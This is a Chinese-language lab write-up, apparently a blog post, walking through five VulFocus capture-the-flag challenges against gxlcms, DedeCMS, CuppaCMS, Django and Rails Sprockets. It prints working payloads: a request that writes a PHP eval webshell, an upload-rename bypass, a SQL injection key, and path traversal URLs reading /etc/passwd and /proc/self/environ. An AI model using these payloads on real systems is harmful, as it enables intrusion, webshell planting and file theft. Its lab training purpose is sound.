漏洞指北-VulFocus靶场专栏-中级03

漏洞指北-VulFocus靶场专栏-初级03

  • 中级009 gxlcms-cve_2018_14685
        • step1:安装系统 密码root
        • step2 进入后台页面 账号密码:admin amdin888
        • step3 查看详细 有phpinfo()
  • 中级010 dedecms-cnvd_2018_01221
        • step1:登录admin admin
        • step2:加入 请求头payload
        • step3 写入abc.lib.php文件(这个好使,上面那个试一下没反应)直接看phpinfo()
  • 中级011 cuppacms-cve_2020_26048
        • step1:登录admin 123456
        • step2: 选择file manager
        • step3 上传php文件的图片格式,拦截请求
        • step4 修改post 重命名格式
        • step5 删除.htaccess文件
        • step6 看怎么写了,如果写一句话木马,那就用中国蚁剑连接,我没用,我直接写的 ls /tmp语句,点入网址就行
  • 中级012 django SQL注入(CVE-2019-14234)
        • step1:进入后台
        • step2: 加入payload
        • step3:搜索flag即可
  • 中级013 Ruby On Rails 路径遍历漏洞(CVE-2018-3760)
        • step1:验证漏洞路径
        • step2 burp suite抓包
        • step3 改包 ,response里寻找flag

中级009 gxlcms-cve_2018_14685

原因
Gxlcms 1.1.4版本中的www/Lib/Lib/Action/Admin/TplAction.class.php文件的‘add’函数存在安全漏洞。远程攻击者可通过发送特制的index.php?s=Admin-Tpl-ADD-id请求利用该漏洞读取任意文件.
账号:admin 密码:admin888
解决方案:

step1:安装系统 密码root

http://10.11.12.28:17302/manager/login.php
漏洞指北-VulFocus靶场专栏-中级03_第1张图片

step2 进入后台页面 账号密码:admin amdin888

漏洞指北-VulFocus靶场专栏-中级03_第2张图片

step3 查看详细 有phpinfo()

漏洞指北-VulFocus靶场专栏-中级03_第3张图片
漏洞指北-VulFocus靶场专栏-中级03_第4张图片

中级010 dedecms-cnvd_2018_01221

原因:最好用火狐 有hackbar免费插件
Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。
解决方案:

step1:登录admin admin

step2:加入 请求头payload

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=%3C?php%20@eval($_POST[cmd]);?%3E
漏洞指北-VulFocus靶场专栏-中级03_第5张图片

step3 写入abc.lib.php文件(这个好使,上面那个试一下没反应)直接看phpinfo()

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=ff5cd321ece87d556508192c04821ff0&filename=abc.lib.php&content=%3C?php%20phpinfo();?%3E
http://10.11.12.28:43491/dede/tag_test_action.php
漏洞指北-VulFocus靶场专栏-中级03_第6张图片
漏洞指北-VulFocus靶场专栏-中级03_第7张图片

中级011 cuppacms-cve_2020_26048

原因
CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
解决方案:

step1:登录admin 123456

step2: 选择file manager

在File Mangager功能中的rename功能是通过前端js进行的,导致rename功能可以抓包绕过,改为.php后缀,导致shell。
漏洞指北-VulFocus靶场专栏-中级03_第8张图片

step3 上传php文件的图片格式,拦截请求

漏洞指北-VulFocus靶场专栏-中级03_第9张图片
l拦截错包了,是是第二个包,看清post的头是不是filemanager
漏洞指北-VulFocus靶场专栏-中级03_第10张图片

step4 修改post 重命名格式

漏洞指北-VulFocus靶场专栏-中级03_第11张图片

step5 删除.htaccess文件

漏洞指北-VulFocus靶场专栏-中级03_第12张图片

step6 看怎么写了,如果写一句话木马,那就用中国蚁剑连接,我没用,我直接写的 ls /tmp语句,点入网址就行


在这里插入图片描述

中级012 django SQL注入(CVE-2019-14234)

原因
Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。可以利用CVE-2019-14234(SQL注入漏洞)向服务器传送包含CVE-2019-9193(命令执行漏洞)系统命令的SQL语句,从而利用SQL语句,执行任意系统命令。
解决方案:

step1:进入后台

http://10.11.12.28:28718/admin/

step2: 加入payload

/admin/vuln/collection/?detail__a%27b=123

step3:搜索flag即可

漏洞指北-VulFocus靶场专栏-中级03_第13张图片

中级013 Ruby On Rails 路径遍历漏洞(CVE-2018-3760)

原因
环境中使用 Sprockets 作为静态文件服务器。Sprockets 是一个编译和分发静态资源文件的 Ruby 库。 Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件。
解决方案:

step1:验证漏洞路径

http://10.11.12.28:10368/assets/file:%2f%2f/etc/passwd
漏洞指北-VulFocus靶场专栏-中级03_第14张图片

step2 burp suite抓包

漏洞指北-VulFocus靶场专栏-中级03_第15张图片

step3 改包 ,response里寻找flag

GET /assets/file:%2F%2F/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/proc/self/environ HTTP/1.1
漏洞指北-VulFocus靶场专栏-中级03_第16张图片

你可能感兴趣的:(VulFocus漏洞指北,网络安全)